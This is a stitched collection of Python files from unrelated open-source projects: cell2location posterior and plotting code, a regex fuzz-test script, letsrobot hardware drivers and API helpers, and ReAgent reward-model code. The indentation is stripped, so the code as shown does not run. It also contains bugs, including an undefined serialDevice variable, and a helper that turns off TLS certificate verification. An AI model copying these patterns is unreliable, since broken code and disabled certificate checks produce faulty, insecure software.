isinstance(data_transform, dict)
and "var_std" in list(data_transform.keys())
and "var_mean" in list(data_transform.keys())
):
# use data transform by scaling
n_in = model.n_vars
self.register_buffer(
"var_mean",
torch.tensor(data_transform["var_mean"].astype("float32").reshape((1, n_in))),
)
self.register_buffer(
"var_std",
torch.tensor(data_transform["var_std"].astype("float32").reshape((1, n_in))),
)
data_transform = self.data_transform_scale()
else:
# use custom data transform
data_transform = data_transform
n_in = model.n_vars
if len(amortised_vars["input"]) >= 2:
encoder_kwargs["n_cat_list"] = n_cat_list
amortised_vars["input_transform"][0] = data_transform
_guide.append(
AutoNormalEncoder(
pyro.poutine.block(model, expose=list(amortised_vars["sites"].keys())),
amortised_plate_sites=amortised_vars,
n_in=n_in,
n_hidden=n_hidden,
init_param_scale=init_param_scale,
encoder_kwargs=encoder_kwargs,
encoder_mode=encoder_mode,
encoder_instance=encoder_instance,
)
)
return _guide
def _data_transform_clusters(self):
def _data_transform(x):
return torch.log1p(torch.cat([x, x @ self.gene_clusters], dim=1))
return _data_transform
def _data_transform_scale(self):
def _data_transform(x):
# return (x - self.var_mean) / self.var_std
return x / self.var_std
return _data_transform
class QuantileMixin:
"""
This mixin class provides methods for:
- computing median and quantiles of the posterior distribution using both direct and amortised inference
"""
def _optim_param(
self,
lr: float = 0.01,
autoencoding_lr: float = None,
clip_norm: float = 200,
module_names: list = ["encoder", "hidden2locs", "hidden2scales"],
):
# TODO implement custom training method that can use this function.
# create function which fetches different lr for autoencoding guide
def optim_param(module_name, param_name):
# detect variables in autoencoding guide
if autoencoding_lr is not None and np.any([n in module_name + "." + param_name for n in module_names]):
return {
"lr": autoencoding_lr,
# limit the gradient step from becoming too large
"clip_norm": clip_norm,
}
else:
return {
"lr": lr,
# limit the gradient step from becoming too large
"clip_norm": clip_norm,
}
return optim_param
@torch.no_grad()
def _posterior_quantile_amortised(self, q: float = 0.5, batch_size: int = 2048, use_gpu: bool = None):
"""
Compute median of the posterior distribution of each parameter, separating local (minibatch) variable
and global variables, which is necessary when performing amortised inference.
Note for developers: requires model class method which lists observation/minibatch plate
variables (self.module.model.list_obs_plate_vars()).
Parameters
----------
q
quantile to compute
batch_size
number of observations per batch
use_gpu
Bool, use gpu?
Returns
-------
dictionary {variable_name: posterior median}
"""
gpus, device = parse_use_gpu_arg(use_gpu)
self.module.eval()
train_dl = AnnDataLoader(self.adata, shuffle=False, batch_size=batch_size)
# sample local parameters
i = 0
for tensor_dict in train_dl:
args, kwargs = self.module._get_fn_args_from_batch(tensor_dict)
args = [a.to(device) for a in args]
kwargs = {k: v.to(device) for k, v in kwargs.items()}
self.to_device(device)
if i == 0:
means = self.module.guide.quantiles([q], *args, **kwargs)
means = {
k: means[k].cpu().numpy()
for k in means.keys()
if k in self.module.model.list_obs_plate_vars()["sites"]
}
# find plate dimension
trace = poutine.trace(self.module.model).get_trace(*args, **kwargs)
# print(trace.nodes[self.module.model.list_obs_plate_vars()['name']])
obs_plate = {
name: site["cond_indep_stack"][0].dim
for name, site in trace.nodes.items()
if site["type"] == "sample"
if any(f.name == self.module.model.list_obs_plate_vars()["name"] for f in site["cond_indep_stack"])
}
else:
means_ = self.module.guide.quantiles([q], *args, **kwargs)
means_ = {
k: means_[k].cpu().numpy()
for k in means_.keys()
if k in list(self.module.model.list_obs_plate_vars()["sites"].keys())
}
means = {
k: np.concatenate([means[k], means_[k]], axis=list(obs_plate.values())[0]) for k in means.keys()
}
i += 1
# sample global parameters
tensor_dict = next(iter(train_dl))
args, kwargs = self.module._get_fn_args_from_batch(tensor_dict)
args = [a.to(device) for a in args]
kwargs = {k: v.to(device) for k, v in kwargs.items()}
self.to_device(device)
global_means = self.module.guide.quantiles([q], *args, **kwargs)
global_means = {
k: global_means[k].cpu().numpy()
for k in global_means.keys()
if k not in list(self.module.model.list_obs_plate_vars()["sites"].keys())
}
for k in global_means.keys():
means[k] = global_means[k]
self.module.to(device)
return means
@torch.no_grad()
def _posterior_quantile(self, q: float = 0.5, batch_size: int = 2048, use_gpu: bool = None):
"""
Compute median of the posterior distribution of each parameter pyro models trained without amortised inference.
Parameters
----------
q
quantile to compute
use_gpu
Bool, use gpu?
Returns
-------
dictionary {variable_name: posterior median}
"""
self.module.eval()
gpus, device = parse_use_gpu_arg(use_gpu)
train_dl = AnnDataLoader(self.adata, shuffle=False, batch_size=batch_size)
# sample global parameters
tensor_dict = next(iter(train_dl))
args, kwargs = self.module._get_fn_args_from_batch(tensor_dict)
args = [a.to(device) for a in args]
kwargs = {k: v.to(device) for k, v in kwargs.items()}
self.to_device(device)
means = self.module.guide.quantiles([q], *args, **kwargs)
means = {k: means[k].cpu().detach().numpy() for k in means.keys()}
return means
def posterior_quantile(self, q: float = 0.5, batch_size: int = 2048, use_gpu: bool = None):
"""
Compute median of the posterior distribution of each parameter.
Parameters
----------
q
quantile to compute
use_gpu
Returns
-------
"""
if self.module.is_amortised:
return self._posterior_quantile_amortised(q=q, batch_size=batch_size, use_gpu=use_gpu)
else:
return self._posterior_quantile(q=q, batch_size=batch_size, use_gpu=use_gpu)
class PltExportMixin:
r"""
This mixing class provides methods for common plotting tasks and data export.
"""
@staticmethod
def plot_posterior_mu_vs_data(mu, data):
r"""Plot expected value of the model (e.g. mean of NB distribution) vs observed data
:param mu: expected value
:param data: data value
"""
plt.hist2d(
np.log10(data.flatten() + 1),
np.log10(mu.flatten() + 1),
bins=50,
norm=matplotlib.colors.LogNorm(),
)
plt.gca().set_aspect("equal", adjustable="box")
plt.xlabel("Data, log10")
plt.ylabel("Posterior expected value, log10")
plt.title("Reconstruction accuracy")
plt.tight_layout()
def plot_history(self, iter_start=0, iter_end=-1, ax=None):
r"""Plot training history
Parameters
----------
iter_start
omit initial iterations from the plot
iter_end
omit last iterations from the plot
ax
matplotlib axis
"""
if ax is None:
ax = plt
ax.set_xlabel = plt.xlabel
ax.set_ylabel = plt.ylabel
if iter_end == -1:
iter_end = len(self.history_["elbo_train"])
ax.plot(
self.history_["elbo_train"].index[iter_start:iter_end],
np.array(self.history_["elbo_train"].values.flatten())[iter_start:iter_end],
label="train",
)
ax.legend()
ax.xlim(0, len(self.history_["elbo_train"]))
ax.set_xlabel("Training epochs")
ax.set_ylabel("-ELBO loss")
plt.tight_layout()
def _export2adata(self, samples):
r"""
Export key model variables and samples
Parameters
----------
samples
dictionary with posterior mean, 5%/95% quantiles, SD, samples, generated by ``.sample_posterior()``
Returns
-------
Updated dictionary with additional details is saved to ``adata.uns['mod']``.
"""
# add factor filter and samples of all parameters to unstructured data
results = {
"model_name": str(self.module.__class__.__name__),
"date": str(date.today()),
"factor_filter": list(getattr(self, "factor_filter", [])),
"factor_names": list(self.factor_names_),
"var_names": self.adata.var_names.tolist(),
"obs_names": self.adata.obs_names.tolist(),
"post_sample_means": samples["post_sample_means"],
"post_sample_stds": samples["post_sample_stds"],
"post_sample_q05": samples["post_sample_q05"],
"post_sample_q95": samples["post_sample_q95"],
}
return results
def sample2df_obs(
self,
samples: dict,
site_name: str = "w_sf",
summary_name: str = "means",
name_prefix: str = "cell_abundance",
):
"""Export posterior distribution summary for observation-specific parameters
(e.g. spatial cell abundance) as Pandas data frame
(means, 5%/95% quantiles or sd of posterior distribution).
Parameters
----------
samples
dictionary with posterior mean, 5%/95% quantiles, SD, samples, generated by ``.sample_posterior()``
site_name
name of the model parameter to be exported
summary_name
posterior distribution summary to return ['means', 'stds', 'q05', 'q95']
name_prefix
prefix to add to column names (f'{summary_name}{name_prefix}_{site_name}_{self\.factor_names_}')
Returns
-------
Pandas data frame corresponding to either means, 5%/95% quantiles or sd of the posterior distribution
"""
return pd.DataFrame(
samples[f"post_sample_{summary_name}"].get(site_name, None),
index=self.adata.obs_names,
columns=[f"{summary_name}{name_prefix}_{site_name}_{i}" for i in self.factor_names_],
)
def sample2df_vars(
self,
samples: dict,
site_name: str = "gene_factors",
summary_name: str = "means",
name_prefix: str = "",
):
r"""Export posterior distribution summary for variable-specific parameters as Pandas data frame
(means, 5%/95% quantiles or sd of posterior distribution).
Parameters
----------
samples
dictionary with posterior mean, 5%/95% quantiles, SD, samples, generated by ``.sample_posterior()``
site_name
name of the model parameter to be exported
summary_name
posterior distribution summary to return ('means', 'stds', 'q05', 'q95')
name_prefix
prefix to add to column names (f'{summary_name}{name_prefix}_{site_name}_{self\.factor_names_}')
Returns
-------
Pandas data frame corresponding to either means, 5%/95% quantiles or sd of the posterior distribution
"""
return pd.DataFrame(
samples[f"post_sample_{summary_name}"].get(site_name, None),
columns=self.adata.var_names,
index=[f"{summary_name}{name_prefix}_{site_name}_{i}" for i in self.factor_names_],
).T
def plot_QC(self, summary_name: str = "means", use_n_obs: int = 1000):
"""
Show quality control plots:
1. Reconstruction accuracy to assess if there are any issues with model training.
The plot should be roughly diagonal, strong deviations signal problems that need to be investigated.
Plotting is slow because expected value of mRNA count needs to be computed from model parameters. Random
observations are used to speed up computation.
Parameters
----------
summary_name
posterior distribution summary to use ('means', 'stds', 'q05', 'q95')
Returns
-------
"""
if getattr(self, "samples", False) is False:
raise RuntimeError("self.samples is missing, please run self.export_posterior() first")
if use_n_obs is not None:
ind_x = np.random.choice(self.adata.n_obs, np.min((use_n_obs, self.adata.n_obs)), replace=False)
else:
ind_x = None
self.expected_nb_param = self.module.model.compute_expected(
self.samples[f"post_sample_{summary_name}"], self.adata, ind_x=ind_x
)
x_data = get_from_registry(self.adata, _CONSTANTS.X_KEY)[ind_x, :]
if issparse(x_data):
x_data = np.asarray(x_data.toarray())
self.plot_posterior_mu_vs_data(self.expected_nb_param["mu"], x_data)
```
#### File: cell2location/plt/plot_in_1D.py
```python
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def plot_absolute_abundances_1D(
adata_sp,
roi_subset=False,
saving=False,
celltype_subset=False,
scaling=0.15,
power=1,
pws=[0, 0, 100, 500, 1000, 3000, 6000],
dimName="VCDepth",
xlab="Cortical Depth",
colourCode=None,
figureSize=(12, 8),
):
r"""
Plot absolute abundance of celltypes in a dotplot across 1 dimension
:param adata_sp: anndata object for spatial data with celltype abundance included in .obs (this is returned by running cell2location first)
:param celltype_subset: list of a subset of cell type names to be plotted
:param slide&radial_position: if wanting to plot only data from one slide + one radial position, include in these parameters
:param cell_types: parameter for only plotting specific cell types where column names in adata_sp.obs are meanSpot[celltype] format
:param roi_subset: optionally a boolean for only using part of the data in adata_sp (corresponding to a specific ROI)
:param saving: optionally a string value, which will result in the plot to be saved under this name
:param scaling: how dot size should scale linearly with abundance values, default 0.15
:param power: how dot size should scale non-linearly with abundance values, default 1 (no non-linear scaling)
:param pws: which abundance values to show in the legend
:param dimName: the name of the dimensions in adata_sp.obs to use for plotting
:param xlab: the x-axis label for the plot
:param colourCode: optionally a dictionary mapping cell type names to colours
:param figureSize: size of the figure
"""
SMALL_SIZE = 18
MEDIUM_SIZE = 18
BIGGER_SIZE = 18
plt.rc("font", size=SMALL_SIZE) # controls default text sizes
plt.rc("axes", titlesize=SMALL_SIZE) # fontsize of the axes title
plt.rc("axes", labelsize=MEDIUM_SIZE) # fontsize of the x and y labels
plt.rc("xtick", labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc("ytick", labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc("legend", fontsize=SMALL_SIZE) # legend fontsize
plt.rc("figure", titlesize=BIGGER_SIZE) # fontsize of the figure title
def subset_obs_column(adata, celltype):
obs_columns = adata.obs.loc[:, [celltype in x.split("mean_spot_factors") for x in adata.obs.columns]]
columns_names = obs_columns.columns
return columns_names
def subset_anndata(adata, celltype, dimName):
adata_subset = adata.copy()
names = subset_obs_column(adata, celltype)
adata_subset.obs = adata_subset.obs.loc[:, names]
adata_subset.obs[dimName] = adata.obs[dimName]
adata_subset.obs["Radial_position"] = adata.obs["Radial_position"]
adata_subset.obs["slide"] = adata.obs["slide"]
return adata_subset
if celltype_subset:
adata_sp = subset_anndata(adata_sp, celltype_subset, dimName)
celltypes = [
x.split("mean_spot_factors")[-1] for x in adata_sp.obs.columns if len(x.split("mean_spot_factors")) == 2
]
abundances = adata_sp.obs.loc[:, [len(x.split("mean_spot_factors")) == 2 for x in adata_sp.obs.columns]]
if roi_subset:
celltypesForPlot = np.repeat(celltypes, sum(roi_subset))
vcForPlot = np.array([adata_sp.obs[dimName].loc[roi_subset] for j in range(len(celltypes))]).flatten()
countsForPlot = np.array([abundances.iloc[:, j].loc[roi_subset] for j in range(len(celltypes))])
else:
celltypesForPlot = np.repeat(celltypes, np.shape(adata_sp)[0])
vcForPlot = np.array([adata_sp.obs[dimName] for j in range(len(celltypes))]).flatten()
countsForPlot = np.array([abundances.iloc[:, j] for j in range(len(celltypes))])
if type(colourCode) is dict:
colourCode = pd.DataFrame(data=colourCode.values(), index=colourCode.keys(), columns=["Colours"])
else:
colourCode = pd.DataFrame(data="black", index=celltypes, columns=["Colours"])
coloursForPlot = np.array(colourCode.loc[np.array(celltypesForPlot), "Colours"])
plt.figure(figsize=(figureSize))
plt.scatter(
vcForPlot,
celltypesForPlot,
s=(1 - np.amin(countsForPlot * scaling) + countsForPlot * scaling) ** power,
c=coloursForPlot,
)
plt.xlabel(xlab)
# make a legend:
for pw in pws:
plt.scatter(
[], [], s=((1 - np.amin(countsForPlot * scaling) + pw * scaling)) ** power, c="black", label=str(pw)
)
h, leng = plt.gca().get_legend_handles_labels()
plt.legend(
h[1:],
leng[1:],
labelspacing=1.2,
title="Total Number",
borderpad=1,
frameon=True,
framealpha=0.6,
edgecolor="k",
facecolor="w",
bbox_to_anchor=(1.55, 0.5),
)
plt.tight_layout()
if saving:
plt.savefig(saving)
def plot_density_1D(
adata_sp,
subset=None,
saving=False,
scaling=0.15,
power=1,
pws=[0, 0, 100, 500, 1000, 3000, 6000, 10000],
dimName="VCDepth",
areaName="AOISurfaceArea",
xlab="Cortical Depth",
colourCode=None,
figureSize=(12, 8),
):
r"""Plot density of celltypes in a dotplot across 1 dimension
:param adata_sp: anndata object for spatial data with celltype abundance included in .obs (this is returned by running cell2location first)
:param subset: optionally a boolean for only using part of the data in adata_sp
:param saving: optionally a string value, which will result in the plot to be saved under this name
:param scaling: how dot size should scale linearly with abundance values, default 0.15
:param power: how dot size should scale non-linearly with abundance values, default 1 (no non-linear scaling)
:param pws: which abundance values to show in the legend
:param dimName: the name of the column in adata_sp.obs that contains the dimension used for plotting
:param areaName: the name of the column in adata_sp.obs that contain the area of each ROI (assumed to be square micrometer)
:param xlab: the x-axis label for the plot
:param colourCode: optionally a dictionary mapping cell type names to colours
:param figureSize: size of the figure
"""
SMALL_SIZE = 18
MEDIUM_SIZE = 18
BIGGER_SIZE = 18
plt.rc("font", size=SMALL_SIZE) # controls default text sizes
plt.rc("axes", titlesize=SMALL_SIZE) # fontsize of the axes title
plt.rc("axes", labelsize=MEDIUM_SIZE) # fontsize of the x and y labels
plt.rc("xtick", labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc("ytick", labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc("legend", fontsize=SMALL_SIZE) # legend fontsize
plt.rc("figure", titlesize=BIGGER_SIZE) # fontsize of the figure title
roi_area = np.array(adata_sp.obs[areaName])
celltypes = [
x.split("mean_spot_factors")[-1] for x in adata_sp.obs.columns if len(x.split("mean_spot_factors")) == 2
]
abundances = adata_sp.obs.loc[:, [len(x.split("mean_spot_factors")) == 2 for x in adata_sp.obs.columns]]
if subset:
celltypesForPlot = np.repeat(celltypes, sum(subset))
vcForPlot = np.array([adata_sp.obs[dimName].loc[subset] for j in range(len(celltypes))]).flatten()
countsForPlot = np.array(
[abundances.iloc[:, j].loc[subset] / roi_area[subset] * 10 ** 6 for j in range(len(celltypes))]
)
else:
celltypesForPlot = np.repeat(celltypes, np.shape(adata_sp)[0])
vcForPlot = np.array([adata_sp.obs[dimName] for j in range(len(celltypes))]).flatten()
countsForPlot = np.array([abundances.iloc[:, j] / roi_area * 10 ** 6 for j in range(len(celltypes))])
if type(colourCode) is dict:
colourCode = pd.DataFrame(data=colourCode.values(), index=colourCode.keys(), columns=["Colours"])
else:
colourCode = pd.DataFrame(data="black", index=celltypes, columns=["Colours"])
coloursForPlot = np.array(colourCode.loc[np.array((celltypesForPlot)), "Colours"])
plt.figure(figsize=(figureSize))
plt.scatter(
vcForPlot,
celltypesForPlot,
s=((1 - np.amin(countsForPlot * scaling) + countsForPlot * scaling)) ** power,
c=coloursForPlot,
)
plt.xlabel(xlab)
# make a legend:
for pw in pws:
plt.scatter(
[], [], s=((1 - np.amin(countsForPlot * scaling) + pw * scaling)) ** power, c="black", label=str(pw)
)
h, leng = plt.gca().get_legend_handles_labels()
plt.legend(
h[1:],
leng[1:],
labelspacing=1.2,
title="Density ($cells/mm^2$)",
borderpad=1,
frameon=True,
framealpha=0.6,
edgecolor="k",
facecolor="w",
bbox_to_anchor=(1, 0.9),
)
plt.tight_layout()
if saving:
plt.savefig(saving)
``` |
{
"source": "jjhoo/otp",
"score": 3
} |
#### File: tiny_regex_c/scripts/regex_test_neg.py
```python
import re
import sys
import string
import random
from subprocess import call
prog = "./tests/test_rand_neg"
if len(sys.argv) < 2:
print("")
print("usage: %s pattern [nrepeat]" % sys.argv[0])
print(" where [nrepeat] is optional")
print("")
sys.exit(-1)
own_prog = sys.argv[0]
pattern = sys.argv[1]
if len(sys.argv) > 2:
ntests = int(sys.argv[2])
else:
ntests = 10
nfails = 0
repeats = ntests
try:
repeats = int(sys.argv[2])
except:
pass
sys.stdout.write("%-35s" % (" pattern '%s': " % pattern))
def gen_no_match(pattern, minlen=1, maxlen=50, maxattempts=500):
nattempts = 0
while True:
nattempts += 1
ret = "".join([random.choice(string.printable) for i in range(random.Random().randint(minlen, maxlen))])
if re.findall(pattern, ret) == []:
return ret
if nattempts >= maxattempts:
raise Exception("Could not generate string that did not match the regex pattern '%s' after %d attempts" % (pattern, nattempts))
while repeats >= 0:
try:
repeats -= 1
example = gen_no_match(pattern)
#print("%s %s %s" % (prog, pattern, example))
ret = call([prog, "\"%s\"" % pattern, "\"%s\"" % example])
if ret != 0:
escaped = repr(example) # escapes special chars for better printing
print(" FAIL : matches %s unexpectedly [%s]." % (escaped, ", ".join([("0x%02x" % ord(e)) for e in example]) ))
nfails += 1
except:
#import traceback
#print("EXCEPTION!")
#raw_input(traceback.format_exc())
ntests -= 1
repeats += 1
#nfails += 1
sys.stdout.write("%4d/%d tests succeeded \n" % (ntests - nfails, ntests))
#print("")
``` |
{
"source": "jjhritz/letsrobot",
"score": 3
} |
#### File: letsrobot/hardware/owi_arm.py
```python
import usb.core, usb.util, time, sys
import logging
log = logging.getLogger('hardware/owi_arm')
# led pesistence variable
led = 0
RoboArm = 0
def setup(robot_config):
#Allocate the name 'RoboArm' to the USB device
global RoboArm
RoboArm = usb.core.find(idVendor=0x1267, idProduct=0x000)
#Check if the arm is detected and warn if not
if RoboArm is None:
log.critical("USB Arm not found")
sys.exit()
def CtrlTransfer(a, b, c, d, e, f):
global led
error = 0
while True :
try:
e[2] = led
RoboArm.ctrl_transfer(a, b, c, d, e, f)
break
except:
error += 1
log.error("USB timeout!")
time.sleep(0.1)
if error == 5:
sys.exit()
pass
#Define a procedure to execute each movement
def MoveArm(Duration, ArmCmd):
#Start the movement
# RoboArm.ctrl_transfer(0x40,6,0x100,0,ArmCmd,3)
CtrlTransfer(0x40,6,0x100,0,ArmCmd,3)
#Stop the movement after waiting a specified duration
time.sleep(Duration)
ArmCmd=[0,0,0]
# RoboArm.ctrl_transfer(0x40,6,0x100,0,ArmCmd,3)
CtrlTransfer(0x40,6,0x100,0,ArmCmd,3)
def move(args):
global led
command = args['command']
if command == 'L':
MoveArm(0.15, [0,2,0]) # Rotate counter-clockwise
if command == 'R':
MoveArm(0.15, [0,1,0]) # Rotate clockwise
if command == 'B':
MoveArm(0.15, [128,0,0]) # Rotate Shoulder down
if command == 'F':
MoveArm(0.15, [64,0,0]) # Rotate Shoulder up
if command == 'U':
MoveArm(0.15, [16,0,0]) # Rotate Elbow up
if command == 'D':
MoveArm(0.15, [32,0,0]) # Rotate Elbow down
if command == 'W':
MoveArm(0.15, [4,0,0]) # Rotate Wrist Up
if command == 'S':
MoveArm(0.15, [8,0,0]) # Rotate Wrist Down
if command == 'C':
MoveArm(0.15, [2,0,0]) # Open Gripper
if command == 'V':
MoveArm(0.15, [1,0,0]) # Close Gripper
if command == '1':
led = 1;
MoveArm(0.15, [0,0,1]) # LED On
if command == '0':
led = 0;
MoveArm(0.15, [0,0,0]) # LED Off
```
#### File: letsrobot/hardware/serial_board.py
```python
import serial
import sys
import logging
log = logging.getLogger('hardware/serial_board')
ser = None
def sendSerialCommand(ser, command):
log.info("serial send: ", str(command.lower()))
ser.write(command.lower().encode('utf8') + b"\r\n") # write a string
ser.flush()
def setup(robot_config):
global ser
serial_device = robot_config.get('serial', 'serial_device')
serialBaud = robot_config.getint('serial', 'baud_rate')
# initialize serial connection
try:
ser = serial.Serial(serialDevice, serialBaud, timeout=0, write_timeout=0) # open serial
except:
log.error("error: could not open serial port")
try:
ser = serial.Serial('/dev/ttyACM0', serialBaud, timeout=0, write_timeout=0) # open serial
except:
log.error("error: could not open serial port /dev/ttyACM0")
try:
ser = serial.Serial('/dev/ttyUSB0', serialBaud, timeout=0, write_timeout=0) # open serial
except:
log.error("error: could not open serial port /dev/ttyUSB0")
try:
ser = serial.Serial('/dev/ttyUSB1', serialBaud, timeout=0, write_timeout=0) # open serial
except:
log.error("error: could not open serial port /dev/ttyUSB1")
try:
ser = serial.Serial('/dev/ttyUSB2', serialBaud, timeout=0, write_timeout=0) # open serial
except:
log.error("error: could not open serial port /dev/ttyUSB2")
if ser is None:
log.critical("error: could not find any valid serial port")
sys.exit()
log.info("Serial Connected")
log.debug("port:", ser.name)
log.debug("baud:", serialBaud)
return(ser)
def move(args):
command = args['command']
sendSerialCommand(ser, command)
```
#### File: jjhritz/letsrobot/robot_util.py
```python
import requests
import time
import traceback
import ssl
import sys
import json
import logging
if (sys.version_info > (3, 0)):
import urllib.request as urllib2
from urllib.error import HTTPError
else:
import urllib2
from urllib2 import HTTPError
log = logging.getLogger('robot_util')
terminate=None
def terminate_controller():
log.info('Attempting to terminate controller...')
if terminate != None:
terminate.acquire()
# TODO : Think about rewriting this, and using request.
def getWithRetry(url, secure=True):
for retryNumber in range(2000):
try:
log.debug("GET", url)
if secure:
response = urllib2.urlopen(url).read()
else:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
response = urllib2.urlopen(url, context=ctx).read()
break
except:
log.exception("could not open url", url)
#traceback.print_exc()
time.sleep(2)
return response.decode('utf-8')
server_panels = '[{"button_panels":[{"button_panel_label": "movement controls","buttons": [{"label": "Left", "command": "L"}, {"label": "Right", "command": "R"}, {"label": "Forward", "command": "F"}, {"label": "Backward","command": "B"}]}]}]'
def getAuthToken(url, payload):
headers = {'content-type': 'application/json'}
response = requests.request("POST", url, data=json.dumps(payload), headers=headers)
return response
# This function passes data to the server api to update the robot settings.
def sendRobotSettings(data, robot_id, api_key):
if not api_key == "":
req = urllib2.Request('https://api.letsrobot.tv/api/v1/robots/%s' % robot_id, json.dumps(data).encode('utf-8') )
req.add_header('Authorization', 'Bearer %s' % api_key)
req.add_header('Content-Type', 'application/json')
try:
f = urllib2.urlopen(req)
except HTTPError:
#log.debug(api_key)
log.error("Unable to update robot config on server! check API key")
response = f.read()
f.close()
log.debug("sendRobotSettings : %s", response)
# This function allows you to set multiple values at once.
def updateRobotSettings(robot_id, api_key, **kwargs ):
data = {}
if (sys.version_info > (3, 0)):
for key, value in kwargs.items():
data[key] = value
else:
for key, value in kwargs.iteritems():
data[key] = value
sendRobotSettings(data, robot_id, api_key)
def setPrivateMode(mode, robot_id, api_key):
data = {}
data['public'] = mode
sendRobotSettings(data, robot_id, api_key)
def setDevMode(mode, robot_id, api_key):
data = {}
data["dev_mode"] = mode
sendRobotSettings(data, robot_id, api_key)
def setAnonControl(mode, robot_id, api_key):
data = {}
data["anonymous_control"] = mode
sendRobotSettings(data, robot_id, api_key)
def setGlobalChat(mode, robot_id, api_key):
data = {}
data["non_global_chat"] = mode
sendRobotSettings(data, robot_id, api_key)
def setWordFilter(mode, robot_id, api_key):
data = {}
data["profanity_filter"] = mode
sendRobotSettings(data, robot_id, api_key)
def setShowExclusive(mode, robot_id, api_key):
data = {}
data["no_exclusive_control_button"] = mode
sendRobotSettings(data, robot_id, api_key)
def setTTSMute(mode, robot_id, api_key):
data = {}
data["mute_text-to-speech"] = mode
sendRobotSettings(data, robot_id, api_key)
def setMicEnabled(mode, robot_id, api_key):
data = {}
data["mic_enabled"] = mode
sendRobotSettings(data, robot_id, api_key)
``` |
{
"source": "jjhugues/alectryon",
"score": 2
} |
#### File: recipes/tests/alternative_clis.py
```python
import sys
from io import BytesIO, TextIOWrapper
from alectryon import cli, literate
def run(cmd, args, stdin):
sys.argv = ["({})".format(cmd.__name__), "-", *args]
sys.stdin = TextIOWrapper(BytesIO(stdin.encode("utf-8")))
print("== {} ==".format(cmd.__name__))
try:
cmd()
sys.exit(0)
except SystemExit as e:
print("-- exit: {} --\n".format(e.code))
def main():
COQ_INPUT = "Check nat."
REST_INPUT = literate.coq2rst(COQ_INPUT)
run(cli.rstcoq2html, ["--no-header", "--pygments-style=emacs"], COQ_INPUT)
run(cli.coqrst2html, ["--no-header"], REST_INPUT)
run(cli.rstcoq2latex, [], COQ_INPUT)
run(cli.coqrst2latex, [], REST_INPUT)
if __name__ == '__main__':
main()
``` |
{
"source": "j-jiafei/ReAgent",
"score": 2
} |
#### File: prediction/synthetic_reward/single_step_synthetic_reward.py
```python
from typing import Tuple, List
import torch
from reagent.prediction.predictor_wrapper import (
ParametricDqnWithPreprocessor,
ParametricDqnPredictorWrapper,
)
class ParametricSingleStepSyntheticRewardPredictorWrapper(torch.jit.ScriptModule):
def __init__(
self,
synthetic_reward_with_preprocessor: ParametricDqnWithPreprocessor,
) -> None:
super().__init__()
self.wrapper = ParametricDqnPredictorWrapper(synthetic_reward_with_preprocessor)
@torch.jit.script_method
def forward(
self,
state_with_presence: Tuple[torch.Tensor, torch.Tensor],
action_with_presence: Tuple[torch.Tensor, torch.Tensor],
) -> torch.Tensor:
reward = self.wrapper(state_with_presence, action_with_presence)[1]
return reward
```
#### File: reagent/replay_memory/utils.py
```python
import logging
from typing import Dict, List
import numpy as np
import pandas as pd
from reagent.replay_memory.circular_replay_buffer import ReplayBuffer
logger = logging.getLogger(__name__)
DEFAULT_DS = "2019-01-01"
def _dense_to_sparse(dense: np.ndarray) -> List[Dict[str, float]]:
"""Convert dense array to sparse representation"""
assert len(dense.shape) == 2, f"dense shape is {dense.shape}"
# pyre-fixme[7]: Expected `List[Dict[str, float]]` but got `List[Dict[int,
# typing.Any]]`.
return [{i: v.item() for i, v in enumerate(elem)} for elem in dense]
def replay_buffer_to_pre_timeline_df(
is_discrete_action: bool, replay_buffer: ReplayBuffer
) -> pd.DataFrame:
"""Format needed for uploading dataset to Hive, and then run timeline."""
n = replay_buffer.size
batch = replay_buffer.sample_transition_batch(batch_size=n)
# actions is inconsistent between models, so let's infer them.
possible_actions_mask = getattr(batch, "possible_actions_mask", None)
possible_actions = getattr(batch, "possible_actions", None)
terminal = batch.terminal.squeeze(1).tolist()
assert len(batch.action.shape) == 2
if is_discrete_action:
assert (
batch.action.shape[1] == 1
), f"discrete action batch with shape {batch.action.shape}"
# Discrete action space, should be str
action = [str(a.item()) for a in batch.action]
# assuming we've explored the whole action space
unique_actions = np.unique(batch.action)
possible_actions_mask = [
[1 for _ in range(len(unique_actions))] if not elem_terminal else []
for elem_terminal in terminal
]
possible_actions = [
[str(a) for a in unique_actions] if not elem_terminal else []
for elem_terminal in terminal
]
else:
# Box (parametric) action space, should be map<str, double>
action = _dense_to_sparse(batch.action)
# TODO: handle possible actions/mask here
sequence_number = batch.sequence_number.squeeze(1).tolist()
action_probability = np.exp(batch.log_prob.squeeze(1)).tolist()
reward = batch.reward.squeeze(1).tolist()
rows = {
"ds": [DEFAULT_DS for _ in range(n)],
"state_features": _dense_to_sparse(batch.state),
"action": action,
"mdp_id": batch.mdp_id.tolist(),
"sequence_number": sequence_number,
"action_probability": action_probability,
"reward": reward,
"metrics": [{"reward": r} for r in reward],
}
if possible_actions_mask is not None:
rows["possible_actions_mask"] = possible_actions_mask
if possible_actions is not None:
rows["possible_actions"] = possible_actions
return pd.DataFrame.from_dict(rows)
```
#### File: test/models/test_synthetic_reward_net.py
```python
import logging
import unittest
import torch
from reagent.models.synthetic_reward import SingleStepSyntheticRewardNet
logger = logging.getLogger(__name__)
class TestSyntheticReward(unittest.TestCase):
def test_single_step_synthetic_reward(self):
state_dim = 10
action_dim = 2
sizes = [256, 128]
activations = ["sigmoid", "relu"]
last_layer_activation = "leaky_relu"
reward_net = SingleStepSyntheticRewardNet(
state_dim=state_dim,
action_dim=action_dim,
sizes=sizes,
activations=activations,
last_layer_activation=last_layer_activation,
)
dnn = reward_net.export_mlp()
# dnn[0] is a concat layer
assert dnn[1].in_features == state_dim + action_dim
assert dnn[1].out_features == 256
assert dnn[2]._get_name() == "Sigmoid"
assert dnn[3].in_features == 256
assert dnn[3].out_features == 128
assert dnn[4]._get_name() == "ReLU"
assert dnn[5].in_features == 128
assert dnn[5].out_features == 1
assert dnn[6]._get_name() == "LeakyReLU"
valid_step = torch.tensor([[1], [2], [3]])
batch_size = 3
seq_len = 4
mask = reward_net.gen_mask(valid_step, batch_size, seq_len)
assert torch.all(
mask
== torch.tensor(
[[0.0, 0.0, 0.0, 1.0], [0.0, 0.0, 1.0, 1.0], [0.0, 1.0, 1.0, 1.0]]
)
)
```
